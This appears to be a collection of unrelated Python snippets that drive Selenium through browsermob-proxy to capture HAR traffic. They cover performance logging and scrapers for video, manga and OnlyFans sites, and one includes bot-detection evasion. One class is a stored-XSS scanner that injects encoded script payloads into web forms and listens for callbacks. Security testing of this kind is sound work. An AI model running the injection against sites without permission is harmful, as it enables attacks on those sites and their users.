def get_viedo_downURL(self, cursor): print("开始请求资源网站") # 建立browsermobproxy服务, 需指定browsermob-proxy, 类似chromedriver server = Server( "D:/下载/browsermob-proxy-2.1.4/bin/browsermob-proxy.bat") server.start() # 创建代理 proxy = server.create_proxy() chrome_options = Options() # 为chrome启动时设置代理 chrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy)) # 静默模式, 不显示浏览器 chrome_options.add_argument('headless') driver = webdriver.Chrome( executable_path= 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe', chrome_options=chrome_options) # driver.set_script_timeout(3) # 这设置了要记录的新HAR(HTTP Archive format(HAR文件),是用来记录浏览器加载网页时所消耗的时间的工具) proxy.new_har(ref="HAR啦", options={ 'captureHeaders': True, 'captureContent': True }, title="标题") driver.get(self.url) title = driver.title torrentName = ''.join(re.findall(r'[A-Za-z]+-\d+', title)).replace('-', '_') # 获取HAR result = proxy.har print(result) # m3u8UrlSet = set() # 把爬取的链接和标题存入数据库 cursor.execute( "CREATE TABLE IF NOT EXISTS torrent(id INTEGER PRIMARY KEY AUTOINCREMENT, title VARCHAR(255) NOT NULL, fileUrl VARCHAR(255) NOT NULL, isGet INT NOT NULL);" ) for entry in result['log']['entries']: _url = entry['request']['url'] # 根据URL找到数据接口 if "m3u8" in _url: print("找到M3U8文件了") print(_url) cursor.execute( "INSERT INTO torrent(id, title, fileUrl, isGet) VALUES (?, ?, ?, ?);", (None, title, _url, 0)) # m3u8UrlSet.add(_url) return torrentName # 判断响应是否存在error if "_error" in entry['response'].keys(): print("Url : {} 响应报错信息为 error : {}".format( _url, entry["response"]["_error"])) # print(m3u8UrlSet) # 代理需要关闭 print("已经要关闭啦!!!!") server.stop() driver.quit() return torrentName
class performance(object): #create performance data def __init__(self, mob_path): #initialize from datetime import datetime print "%s: Go " % (datetime.now()) self.browser_mob = mob_path self.server = self.driver = self.proxy = None @staticmethod def __store_into_file(args, title, result): #store data collected into file if 'path' in args: har_file = open(args['path'] + '/' + title + '.json', 'w') else: har_file = open(title + '.json', 'w') har_file.write(str(result)) har_file.close() def __start_server(self): #prepare and start server self.server = Server(self.browser_mob) self.server.start() self.proxy = self.server.create_proxy() def __start_driver(self, args): #prepare and start driver #chromedriver if args['browser'] == 'chrome': print "Browser: Chrome" print "URL: {0}".format(args['url']) chromedriver = os.getenv("CHROMEDRIVER_PATH", "/chromedriver") os.environ["webdriver.chrome.driver"] = chromedriver url = urlparse.urlparse(self.proxy.proxy).path chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={0}".format(url)) chrome_options.add_argument("--no-sandbox") self.driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options) #firefox if args['browser'] == 'firefox': print "Browser: Firefox" profile = webdriver.FirefoxProfile() profile.set_proxy(self.proxy.selenium_proxy()) self.driver = webdriver.Firefox(firefox_profile=profile) def start_all(self, args): #start server and driver self.__start_server() self.__start_driver(args) def create_har(self, args): #start request and parse response self.proxy.new_har(args['url'], options={'captureHeaders': True}) self.driver.get(args['url']) result = json.dumps(self.proxy.har, ensure_ascii=False) self.__store_into_file(args, 'har', result) performance = json.dumps( self.driver.execute_script("return window.performance"), ensure_ascii=False) self.__store_into_file(args, 'perf', performance) def stop_all(self): #stop server and driver from datetime import datetime print "%s: Finish" % (datetime.now()) self.server.stop() self.driver.quit()
class BrowserMobLibrary(): ROBOT_LIBRARY_SCOPE = 'GLOBAL' ROBOT_LIBRARY_VERSION = VERSION def __init__(self): self.isServerStarted = False self.activeProxy = None self.server = None self.proxies = [] def _proxy(self): if self.activeProxy is None: raise Exception("No proxy has been created") return self.activeProxy def start_browsermob(self, browsermob_path): self.server = Server(browsermob_path) self.server.start() self.isServerStarted = True def stop_browsermob(self): self.server.stop() self.server = None self.isServerStarted = False def create_proxy(self): self.activeProxy = self.server.create_proxy self.proxies.append(self.activeProxy) return self.server.create_proxy() def close_proxy(self, proxy): self.proxies.remove(proxy) proxy.close() def close_active_proxy(self): self.close_proxy(self.activeProxy) def set_active_proxy(self, proxy): self.activeProxy = proxy def get_active_proxy(self): return self.activeProxy def get_all_proxies(self): return self.proxies def close_all_proxies(self): for proxy in self.proxies: proxy.close() def capture_traffic(self, reference=None, **options): return self._proxy().new_har(reference, options) def get_captured_traffic(self): return self._proxy().har def set_capture_reference(self, reference=None): return self._proxy().new_page(reference) def ignore_all_traffic_matching(self, regexp, status_code): return self._proxy().blacklist(regexp, status_code) def only_capture_traffic_matching(self, regexp, status_code): return self._proxy().whitelist(regexp, status_code) def use_basic_authentication(self, domain, username, password): return self._proxy().basic_authentication(domain, username, password) def set_headers(self, headers, ): return self._proxy().headers(headers) def set_response_interceptor(self, js, ): return self._proxy().response_interceptor(js) def set_request_interceptor(self, js, ): return self._proxy().request_interceptor(js) def set_bandwith_limits(self, **options): return self._proxy().limits(options) def set_proxy_timeouts(self, **options): return self._proxy().timeouts(options) def remap_hosts(self, address, ip_address): return self._proxy().remap_hosts(address, ip_address) def wait_for_traffic_to_stop(self, quiet_period, timeout): return self._proxy().wait_for_traffic_to_stop(quiet_period, timeout) def clear_proxy_dns_cache(self): return self._proxy().clear_dns_cache() def rewrite_url(self, match, replace): return self._proxy().rewrite_url(match, replace)
class StoredXSSDetector: def __init__(self, results, reports, **kwargs): self.results = results self.reports = reports self.args = kwargs self.factor_length = 6 self.factor = randstr(self.factor_length) self.rand_length = 10 self.listen_port = 9759 self.filled_forms = {} self.str_mapping = {} self.bindings = {} self.lock = threading.Lock() self.vulnerable = [] self.server = None self.cookies = {} for entry in self.args['cookie'].split(';'): if entry.find('=') == -1: continue key, value = entry.strip().split('=', 1) self.cookies[key] = value # Create proxy server logging.info('Starting browsermobproxy server...') self.proxy_server = Server(self.args['browsermobproxy']) self.proxy_server.start() self.proxy = self.proxy_server.create_proxy() logging.info('Browsermobproxy server started') # Create Chrome engine logging.info('Creating Selenium Chrome webdriver...') self.chrome_options = webdriver.ChromeOptions() self.chrome_options.add_argument('--proxy-server={}'.format( self.proxy.proxy)) if 'headless' in self.args: self.chrome_options.add_argument('--headless') self.chrome_options.add_argument('--disable-gpu') self.chrome_options.add_argument("--disable-extensions") self.driver = webdriver.Chrome(chrome_options=self.chrome_options) logging.info('Selenium Chrome webdriver created') @staticmethod def meta(): return {'name': 'Stored XSS Detector for all', 'version': '1.0'} def random_form(self): logging.info('Start sending random payload') for uuid in self.results['requests']: logging.info('Processing form {}'.format(uuid)) request = self.results['requests'][uuid] if request['content-type'] == 'text/plain': logging.warning('Form {} is text/plain. Skipped'.format(uuid)) continue params = {} self.filled_forms[request['uuid']] = {} r = None for name in request['fields']: field = request['fields'][name] if field['type'] in ['text', 'password', 'textarea']: params[name] = self.factor + randstr(self.rand_length) self.filled_forms[request['uuid']][name] = params[name] self.str_mapping[params[name]] = (request['uuid'], name) elif field['type'] == 'radio': params[name] = field['values'][0] elif field['type'] == 'checkbox': params[name] = field['value'] else: params[name] = field['default'] if request['method'] == 'GET': r = requests.get(request['url'], params=params, cookies=self.cookies) elif request['method'] == 'POST': if request[ 'content-type'] == 'application/x-www-form-urlencoded': r = requests.post(request['url'], data=params, cookies=self.cookies) elif request['content-type'] == 'multipart/form-data': r = requests.post(request['url'], files=params, cookies=self.cookies) if r.status_code not in [200, 301, 302, 306, 307, 308]: del self.filled_forms[request['uuid']] logging.warning('Failed to send form {}'.format(uuid)) logging.info('Form {} sent successfully'.format(uuid)) def bind_form(self): logging.info('Start binding urls with forms') for url in self.results['urls']: logging.info('Crawling {}'.format(url)) r = requests.get(url, cookies=self.cookies) text = r.text pos = text.find(self.factor) while pos != -1: rand = text[pos:pos + self.factor_length + self.rand_length] if rand in self.str_mapping: logging.info('Found a binding in {}'.format(url)) self.bindings[self.str_mapping[rand]] = url pos = text.find(self.factor, pos + self.factor_length + self.rand_length) def start_server(self): class Handler(BaseHTTPRequestHandler): def do_GET(s): query = parse_qs(urlparse(s.path).query) if 'uuid' in query and 'name' in query: self.lock.acquire() try: pair = (query['uuid'][0], query['name'][0], query['url'][0]) if pair not in self.vulnerable: self.vulnerable.append(pair) finally: self.lock.release() s.send_response(200) s.send_header('Content-Type', 'text/html') s.end_headers() s.wfile.write(b'') def start_server(): logging.info('Starting monitor server at port {}...'.format( self.listen_port)) self.server.serve_forever() self.server = HTTPServer(('127.0.0.1', self.listen_port), Handler) t = threading.Thread(target=start_server, daemon=True) t.start() time.sleep(3) def send_payload(self): logging.info('Start to send payload') for info in self.bindings: url = self.bindings[info] request = self.results['requests'][info[0]] logging.info('Testing payload for form {}'.format(info[0])) params = {} for name in request['fields']: field = request['fields'][name] if name == info[1]: script = script_template.format(self.listen_port, info[0], info[1]) params[name] = \ base64.b64decode(xss_payload[0]).decode('utf-8') + script + \ base64.b64decode(xss_payload[1]).decode('utf-8') + script + \ base64.b64decode(xss_payload[2]).decode('utf-8') elif field['type'] == 'radio': params[name] = field['values'][0] elif field['type'] == 'checkbox': params[name] = field['value'] else: params[name] = field['default'] r = None if request['method'] == 'GET': r = requests.get(request['url'], params=params, cookies=self.cookies) elif request['method'] == 'POST': if request[ 'content-type'] == 'application/x-www-form-urlencoded': r = requests.post(request['url'], data=params, cookies=self.cookies) elif request['content-type'] == 'multipart/form-data': r = requests.post(request['url'], files=params, cookies=self.cookies) if r.status_code not in [200, 301, 302, 306, 307, 308]: continue self.driver.get(url) for key in self.cookies: exist = self.driver.get_cookie(key) if exist is not None and exist['value'] != self.cookies[key]: self.driver.add_cookie({ 'name': key, 'value': self.cookies[key] }) self.driver.get(url) def stop_server(self): self.server.shutdown() logging.info('The monitoring server has been closed') def make_report(self): def make_entry(v): request = self.results['requests'][v[0]] return [ request['location'], request['url'], request['method'], v[1], html.escape(v[2]) ] self.reports.append({ 'title': 'Stored XSS Injection Points', 'overview': 'Found {} Stored XSS injection point(s)'.format( len(self.vulnerable)), 'header': ['Form Location', 'Target', 'Method', 'Name', 'XSS Location'], 'entries': list(map(make_entry, self.vulnerable)) }) def exec(self): logging.info('Start to test stored XSS points') if 'requests' not in self.results: logging.fatal('There\'s no requests in results') raise NoRequestsException self.random_form() self.bind_form() self.start_server() self.send_payload() self.stop_server() self.make_report() logging.info('Stopping proxy server and Chrome webdriver...') self.proxy.close() self.proxy_server.stop() self.driver.stop_client() self.driver.close() logging.info('Proxy server and Chrome webdriver have been closed')
def main(argv): init() parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='start_url', help='Set page URL', required=True) parser.add_argument('-c', action='store', dest='cookies_file', help='JSON file with cookies', required=False) parser.add_argument( '-w', action='store', dest='webdriver_type', help='Set WebDriver type (firefox or phantomjs, firebox by default)', default="firefox", required=False) results = parser.parse_args() start_url = results.start_url cookies_file = results.cookies_file webdriver_type = results.webdriver_type allowed_domain = urlparse(start_url).netloc browsermobproxy_path = get_browsermobproxy_path() options = { 'port': 9090, } server = Server(browsermobproxy_path, options) server.start() proxy = server.create_proxy() if webdriver_type == "phantomjs": service_args = [ '--proxy=localhost:9091', '--proxy-type=http', ] driver = webdriver.PhantomJS(service_args=service_args) driver.set_window_size(1440, 1024) else: profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) proxy.new_har('woodpycker', options={ 'captureHeaders': True, 'captureContent': True }) driver.get(start_url) if not cookies_file is None: with open(cookies_file, 'rb') as fp: cookies = json.load(fp) for cookie in cookies: driver.add_cookie(cookie) driver.refresh() links = driver.find_elements_by_tag_name('a') lenl = len(links) for i in range(0, lenl): if links[i].is_displayed(): url = links[i].get_attribute('href') text = links[i].get_attribute('text') if url.find(allowed_domain) != -1: links[i].click() print "%s Clicked on the link '%s' with HREF '%s'" % ( Fore.BLUE + "*" + Fore.RESET, Style.BRIGHT + text + Style.RESET_ALL, Style.BRIGHT + url + Style.RESET_ALL) show_status_codes(proxy.har, allowed_domain) driver.back() driver.refresh() links = driver.find_elements_by_tag_name('a') driver.quit() server.stop()
class Browser: def __init__(self, chromedriverPath, browsermobPath, harfilePath, cookies=None): self.harfilePath = harfilePath self.server = Server(browsermobPath) self.server.start() self.proxy = self.server.create_proxy() os.environ["webdriver.chrome.driver"] = chromedriverPath url = urlparse (self.proxy.proxy).path chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={0}".format(url)) self.driver = webdriver.Chrome(chromedriverPath,chrome_options =chrome_options) if cookies: print("Loading cookies from "+str(cookies)) with open(cookies, 'r') as cookieFile: cookieJson = json.loads(cookieFile.read()) for cookie in cookieJson: self.driver.add_cookie(cookie) def get(self, url, timeout=20): print(url) self.proxy.new_har(url, {"captureContent":True}) try: self.driver.set_page_load_timeout(timeout) self.driver.get(url) self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight/5);") time.sleep(.5) #wait for the page to load self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight/4);") time.sleep(.5) #wait for the page to load self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight/3);") time.sleep(.5) #wait for the page to load self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight/2);") time.sleep(.5) #wait for the page to load self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight);") time.sleep(4) #wait for the page to load except TimeoutException: print("Timeout") self.driver.find_element_by_tag_name("body").send_keys(Keys.CONTROL+Keys.ESCAPE) try: source = self.driver.page_source result = json.dumps(self.proxy.har, ensure_ascii=False) with open(self.harfilePath+"/"+str(int(time.time()*1000.0))+".har", "w") as harfile: harfile.write(result) return source except TimeoutException: print("Retrying, with a timeout of "+str(timeout+5)) return self.get(url, timeout=timeout+5) def close(self): try: self.server.stop() except Exception: print("Warning: Error stopping server") pass try: self.driver.quit() except Exception: print("Warning: Error stopping driver") pass
class performance(object): #create performance data def __init__(self, mob_path): #initialize from datetime import datetime print "%s: Go "%(datetime.now()) self.browser_mob = mob_path self.server = self.driver = self.proxy = None @staticmethod def __store_into_file(args,title, result): #store data collected into file if 'path' in args: har_file = open(args['path']+'/'+title + '.json', 'w') else: har_file = open(title + '.json', 'w') har_file.write(str(result)) har_file.close() def __start_server(self): #prepare and start server self.server = Server(self.browser_mob) self.server.start() self.proxy = self.server.create_proxy() def __start_driver(self,args): #prepare and start driver #chromedriver if args['browser'] == 'chrome': print "Browser: Chrome" print "URL: {0}".format(args['url']) chromedriver = os.getenv("CHROMEDRIVER_PATH", "/chromedriver") os.environ["webdriver.chrome.driver"] = chromedriver url = urlparse.urlparse (self.proxy.proxy).path chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={0}".format(url)) chrome_options.add_argument("--no-sandbox") self.driver = webdriver.Chrome(chromedriver,chrome_options = chrome_options) #firefox if args['browser'] == 'firefox': print "Browser: Firefox" profile = webdriver.FirefoxProfile() profile.set_proxy(self.proxy.selenium_proxy()) self.driver = webdriver.Firefox(firefox_profile=profile) def start_all(self,args): #start server and driver self.__start_server() self.__start_driver(args) def create_har(self,args): #start request and parse response self.proxy.new_har(args['url'], options={'captureHeaders': True}) self.driver.get(args['url']) result = json.dumps(self.proxy.har, ensure_ascii=False) self.__store_into_file(args,'har', result) performance = json.dumps(self.driver.execute_script("return window.performance"), ensure_ascii=False) self.__store_into_file(args,'perf', performance) def stop_all(self): #stop server and driver from datetime import datetime print "%s: Finish"%(datetime.now()) self.server.stop() self.driver.quit()
def _real_extract(self, url): try: with VideovardIE._LOCK: self.report_extraction(url) videoid = self._match_id(url) while True: _server_port = 18080 + VideovardIE._NUM * 100 _server = Server( path= "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy", options={'port': _server_port}) try: if _server._is_listening(): VideovardIE._NUM += 1 if VideovardIE._NUM == 25: raise Exception("mobproxy max tries") else: _server.start({ "log_path": "/dev", "log_file": "null" }) self.to_screen( f"[{url}] browsermob-proxy start OK on port {_server_port}" ) VideovardIE._NUM += 1 break except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen( f'[{url}] {repr(e)} \n{"!!".join(lines)}') if _server.process: _server.stop() raise ExtractorError( f"[{url}] browsermob-proxy start error - {repr(e)}" ) _host = 'localhost' _port = _server_port + 1 _harproxy = _server.create_proxy({'port': _port}) driver = self.get_driver(host=_host, port=_port) try: _harproxy.new_har(options={ 'captureHeaders': True, 'captureContent': True }, ref=f"har_{videoid}", title=f"har_{videoid}") self.send_multi_request(driver, url.replace('/e/', '/v/')) title = try_get( self.wait_until( driver, 60, ec.presence_of_element_located( (By.TAG_NAME, "h1"))), lambda x: x.text) vpl = self.wait_until( driver, 60, ec.presence_of_element_located((By.ID, "vplayer"))) for i in range(2): try: vpl.click() self.wait_until(driver, 1) vpl.click() break except Exception as e: el_kal = self.wait_until( driver, 60, ec.presence_of_element_located( (By.CSS_SELECTOR, "div.kalamana"))) if el_kal: el_kal.click() self.wait_until(driver, 1) el_rul = self.wait_until( driver, 60, ec.presence_of_element_located( (By.CSS_SELECTOR, "div.rulezco"))) if el_rul: el_rul.click() self.wait_until(driver, 1) continue har = _harproxy.har m3u8_url = self.scan_for_request(har, f"har_{videoid}", f"master.m3u8") if m3u8_url: self.write_debug(f"[{url}] m3u8 url - {m3u8_url}") res = self.send_multi_request(None, m3u8_url) if not res: raise ExtractorError(f"[{url}] no m3u8 doc") m3u8_doc = (res.content).decode('utf-8', 'replace') self.write_debug(f"[{url}] \n{m3u8_doc}") formats_m3u8, _ = self._parse_m3u8_formats_and_subtitles( m3u8_doc, m3u8_url, ext="mp4", entry_protocol='m3u8_native', m3u8_id="hls") if not formats_m3u8: raise ExtractorError( f"[{url}] Can't find any M3U8 format") self._sort_formats(formats_m3u8) return ({ "id": videoid, "title": sanitize_filename(title, restricted=True), "formats": formats_m3u8, "ext": "mp4" }) except ExtractorError as e: raise except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen(f'{repr(e)} \n{"!!".join(lines)}') raise ExtractorError(repr(e)) finally: _harproxy.close() _server.stop() self.rm_driver(driver) except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen(f'{repr(e)} \n{"!!".join(lines)}') raise ExtractorError(repr(e))
def worker(self): # Set basic var for the function self.urls_down = [] network_events = [] URLS = self.urls_list page_nbr = len(self.urls_list) - 1 path = os.getcwd() # Browsermob binaries location browsermobproxy_location = "{}/browsermob/browsermob-proxy".format( path) # Start browsermob server print("Proxy init...") server = Server(browsermobproxy_location) server.start() time.sleep(1) proxy = server.create_proxy() time.sleep(1) # Set option for the webdriver, automation detection from japscan, certificate, and headless chrome_path = "{}/chromedriver".format(path) chrome_options = webdriver.ChromeOptions() chrome_options.add_experimental_option("useAutomationExtension", False) chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"]) chrome_options.set_capability("acceptInsecureCerts", True) chrome_options.add_argument("--log-level=3") chrome_options.add_argument('--proxy-server=%s' % proxy.proxy) chrome_options.add_argument("--disable-blink-features") chrome_options.add_argument( "--disable-blink-features=AutomationControlled") chrome_options.add_argument("--headless") caps = DesiredCapabilities.CHROME driver = webdriver.Chrome(chrome_path, desired_capabilities=caps, options=chrome_options) print("Driver init...") # Do a while loop in case of timeout it happen sometimes while True: print("Fetch :") try: # Initiate the driver with low consumption website driver.set_page_load_timeout(30) driver.get('http://perdu.com/') # if the page number is even scrap only even page, since we can scrap the current page and the next page it's shorter if page_nbr % 2 == 0: for URL in tqdm(URLS[::2]): network_events = [] proxy.new_har("urls") driver.get(URL) # Get the page logs entries = proxy.har['log']["entries"] for entry in entries: if 'request' in entry.keys(): network_events.append(entry['request']['url']) # Extract only the imges matches = [ s for s in network_events if ".jpg" in s and "japscan.co" in s or ".png" in s and "japscan.co" in s ] matches = [x for x in matches if "bg." not in x] # Add images Urls to a list for match in matches: self.urls_down.append(match) # Same operation if page number is odd if page_nbr % 2 != 0: for URL in tqdm(URLS[1::2]): network_events = [] proxy.new_har("urls") driver.get(URL) entries = proxy.har['log']["entries"] for entry in entries: if 'request' in entry.keys(): network_events.append(entry['request']['url']) matches = [ s for s in network_events if ".jpg" in s and "japscan.co" in s or ".png" in s and "japscan.co" in s ] matches = [x for x in matches if "bg." not in x] for match in matches: self.urls_down.append(match) break except TimeoutException as ex: print("Timeout, retry" + str(ex)) driver.quit() continue # Remove duplicate self.urls_down = list(dict.fromkeys(self.urls_down)) # Stop the server and the driver server.stop() driver.quit() # Return image url list return
def get_signature_url(user_url): try: # 代理服务 server = Server(proxy_file) server.start() proxy = server.create_proxy() options = webdriver.ChromeOptions() # ChromeOptions() options.add_argument("--proxy-server={0}".format(proxy.proxy)) options.add_argument('--disable-gpu') # options.add_argument('--dump-dom') # options.add_argument('--disable-web-security') # options.headless = True options.add_argument('lang=zh_CN.UTF-8') options.add_argument("user-agent=" + ua) options.add_argument('accept=' + accept[0]) options.add_argument("accept-language=" + accept_language[0]) options.add_argument('accept-encoding="gzip, deflate, br"') options.add_argument("upgrade-insecure-requests=1") options.add_argument('cache-control="max-age=0"') options.add_experimental_option('excludeSwitches', ['enable-automation']) # 爬虫关键字 # webdriver.Firefox(options,executable_path=fireFox_driver) # # webdriver.Firefox(firefox_options=chrome_options)# driver = webdriver.Chrome(options=options) proxy.new_har("douyin", options={'captureHeaders': True, 'captureContent': True}) logger.info("原始URL {}".format(url)) driver.set_network_conditions( offline=False, latency=5, # additional latency (ms) download_throughput=500 * 1024, # maximal throughput upload_throughput=500 * 1024) # maximal throughput driver.get(user_url) network = driver.get_network_conditions() print(network) time.sleep(3) result = proxy.har # 获取HAR # print(result) for entry in result['log']['entries']: _url = entry['request']['url'] # print(_url) # # 根据URL找到数据接口,这里要找的是 http://git.liuyanlin.cn/get_ht_list 这个接口 if "_signature" in _url: logger.info("获取到用户第一个数据请求接口------>>>\n{}".format(_url)) driver.get(_url) cookies = driver.get_cookies() time.sleep(3) print(driver.page_source) print(cookies) return _url # print(_url) # _response = entry['response'] # _content = _response['content'] # 获取接口返回内容 # print(_content) except Exception as e: logger.exception(e) pass finally: server.stop() driver.quit()
def _real_extract(self, url): try: self.report_extraction(url) with OnlyFansPostIE._LOCK: while True: _server_port = 18080 + 100 * OnlyFansPostIE._NUM _server = Server( path= "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy", options={'port': _server_port}) if _server._is_listening(): OnlyFansPostIE._NUM += 1 if OnlyFansPostIE._NUM == 25: raise Exception("mobproxy max tries") else: _server.start({'log_path': '/dev', 'log_file': 'null'}) OnlyFansPostIE._NUM += 1 break _host = 'localhost' _port = _server_port + 1 _harproxy = _server.create_proxy({'port': _port}) driver = self.get_driver(host=_host, port=_port) driver = self.get_driver(host=_host, port=_port) self.send_driver_request(driver, self._SITE_URL) for cookie in OnlyFansPlaylistIE._COOKIES: driver.add_cookie(cookie) account, mode = re.search(self._VALID_URL, url).group("account", "mode") if not mode: mode = "latest" entries = {} if mode in ("all", "latest", "favorites", "tips"): self.send_driver_request(driver, f"{self._SITE_URL}/{account}") res = self.wait_until(driver, 60, error404_or_found()) if not res or res[0] == "error404": raise ExtractorError( "Error 404: User profile doesnt exists") _url = f"{self._SITE_URL}/{account}/videos{self._MODE_DICT[mode]}" _harproxy.new_har(options={ 'captureHeaders': False, 'captureContent': True }, ref=f"har_{account}_{mode}", title=f"har_{account}_{mode}") self.send_driver_request(driver, _url) self.wait_until( driver, 60, ec.presence_of_all_elements_located( (By.CLASS_NAME, "b-photos__item.m-video-item"))) if mode in ("latest"): har = _harproxy.har data_json = self.scan_for_request(har, f"har_{account}_{mode}", "posts/videos?") if data_json: self.write_debug(data_json) list_json = data_json.get('list') if list_json: for info_json in list_json: _entry = self._extract_from_json( info_json, user_profile=account) if _entry: for _video in _entry: if not _video['id'] in entries.keys(): entries[_video['id']] = _video else: if _video.get( 'duration', 1) > entries[ _video['id']].get( 'duration', 0): entries[_video['id']] = _video else: #lets scroll down in the videos pages till the end self.wait_until(driver, 600, scroll(10)) har = _harproxy.har _reg_str = r'/api2/v2/users/\d+/posts/videos\?' data_json = self.scan_for_all_requests( har, f"har_{account}_{mode}", _reg_str) if data_json: self.write_debug(data_json) list_json = [] for el in data_json: list_json += el.get('list') self.write_debug(list_json) for info_json in list_json: _entry = self._extract_from_json( info_json, user_profile=account) if _entry: for _video in _entry: if not _video['id'] in entries.keys(): entries[_video['id']] = _video else: if _video.get( 'duration', 1) > entries[_video['id']].get( 'duration', 0): entries[_video['id']] = _video elif mode in ("chat"): _harproxy.new_har(options={ 'captureHeaders': False, 'captureContent': True }, ref=f"har_{account}_{mode}", title=f"har_{account}_{mode}") _url = f"{self._SITE_URL}/{account}" self.send_driver_request(driver, _url) res = self.wait_until(driver, 60, error404_or_found()) if not res or res[0] == "error404": raise ExtractorError("User profile doesnt exists") har = _harproxy.har data_json = self.scan_for_request(har, f"har_{account}_{mode}", f"users/{account}") #self.to_screen(data_json) userid = try_get(data_json, lambda x: x['id']) if not userid: raise ExtractorError("couldnt get id user for chat room") url_chat = f"https://onlyfans.com/my/chats/chat/{userid}/" self.to_screen(url_chat) self.send_driver_request(driver, url_chat) #init start of chat is to be at the end, with all the previous messages above. Lets scroll # up to the start of the chat el_chat_scroll = self.wait_until( driver, 60, ec.presence_of_element_located(( By.CSS_SELECTOR, "div.b-chats__scrollbar.m-custom-scrollbar.b-chat__messages.m-native-custom-scrollbar.m-scrollbar-y.m-scroll-behavior-auto" ))) self.wait_until(driver, 1) el_chat_scroll.send_keys(Keys.HOME) self.wait_until(driver, 5) har = _harproxy.har _reg_str = r'/api2/v2/chats/\d+/messages' data_json = self.scan_for_all_requests( har, f"har_{account}_{mode}", _reg_str) if data_json: self.write_debug(data_json) list_json = [] for el in data_json: list_json += el.get('list') for info_json in list_json: _entry = self._extract_from_json(info_json, user_profile=account) if _entry: for _video in _entry: if not _video['id'] in entries.keys(): entries[_video['id']] = _video else: if _video.get( 'duration', 1) > entries[_video['id']].get( 'duration', 0): entries[_video['id']] = _video if entries: return self.playlist_result(list(entries.values()), "Onlyfans:" + account, "Onlyfans:" + account) else: raise ExtractorError("no entries") except ExtractorError as e: raise except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen(f'{repr(e)} \n{"!!".join(lines)}') raise ExtractorError(repr(e)) finally: _harproxy.close() _server.stop() self.rm_driver(driver)
def retrieve_har(): print "Retrieving .har file using generated url..." har_name_ex = har_name + ".har" complete_har_path = os.path.join(har_save_path, har_name_ex) # Magic starts here: server = Server(path) server.start() proxy = server.create_proxy() profile = webdriver.FirefoxProfile(ff_profile) profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) # Broken script to load the page in Google Chrome instead of Mozilla Firefox """ chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={0}".format(proxy.proxy)) driver = webdriver.Chrome(chrome_options = chrome_options) """ proxy.new_har(har_name, options={'captureHeaders': True}) driver.get(url) #Trying to click 'vplayer' try: driver.switch_to.frame(0) # Clicking the video automagically jwplayer = driver.find_element_by_name('vplayer') jwplayer.click() #And if that somehow doesn't work except Exception: print "Couldn't click player!" print "Trying again in 5 seconds..." time.sleep(5) #Try it again... try: driver.switch_to.frame(0) # Clicking the video automagically (again) jwplayer = driver.find_element_by_name('vplayer') jwplayer.click() #And if that doesn't work either except Exception: print "Not able to click the video player" #Stop the server and the driver server.stop() driver.quit() time.sleep(3) sys.exit() time.sleep(1) #Exporting the wanted .har file result = json.dumps(proxy.har, ensure_ascii=False, indent=4) # indent=4 puts the .har file on seperated lines #And write it to an automatically created file har_file = open(complete_har_path,'w') har_file.write(str(result)) har_file.close() #Stop the server and the driver server.stop() driver.quit()
def _get_videos_from_subs(self, url): try: _url_videos = f"{url}/videos" self.report_extraction(_url_videos) with OnlyFansActSubslistIE._LOCK: _server_port = 18080 + 100 * OnlyFansActSubslistIE._NUM OnlyFansActSubslistIE._NUM += 1 _server = Server( path= "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy", options={'port': _server_port}) _server.start({'log_path': '/dev', 'log_file': 'null'}) _host = 'localhost' _port = _server_port + 1 _host = 'localhost' _harproxy = _server.create_proxy({'port': _port}) driver = self.get_driver(host=_host, port=_port, msg=f'[{_url_videos}]') self.send_driver_request(driver, self._SITE_URL) for cookie in OnlyFansActSubslistIE._COOKIES: driver.add_cookie(cookie) self.send_driver_request(driver, url) res = self.wait_until(driver, 60, error404_or_found()) if not res or res[0] == "error404": raise ExtractorError( f"[{_url_videos}] User profile doesnt exists") account = url.split("/")[-1] _harproxy.new_har(options={ 'captureHeaders': False, 'captureContent': True }, ref=f"har_actsubs_{account}", title=f"har_actsubs_{account}") self.send_driver_request(driver, _url_videos) self.wait_until( driver, 60, ec.presence_of_all_elements_located( (By.CLASS_NAME, "b-photos__item.m-video-item"))) har = _harproxy.har data_json = self.scan_for_request(har, f"har_actsubs_{account}", "posts/videos?") entries = {} if data_json: self.write_debug(data_json) list_json = data_json.get('list') if list_json: for info_json in list_json: _entry = self._extract_from_json(info_json, user_profile=account) if _entry: for _video in _entry: if not _video['id'] in entries.keys(): entries[_video['id']] = _video else: if _video.get( 'duration', 1) > entries[_video['id']].get( 'duration', 0): entries[_video['id']] = _video if not entries: raise ExtractorError(f"[{_url_videos}] no entries") return list(entries.values()) except ExtractorError as e: raise except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen(f'[{_url_videos}] {repr(e)} \n{"!!".join(lines)}') raise ExtractorError(f'[{_url_videos}] {repr(e)}') finally: _harproxy.close() _server.stop() self.rm_driver(driver)
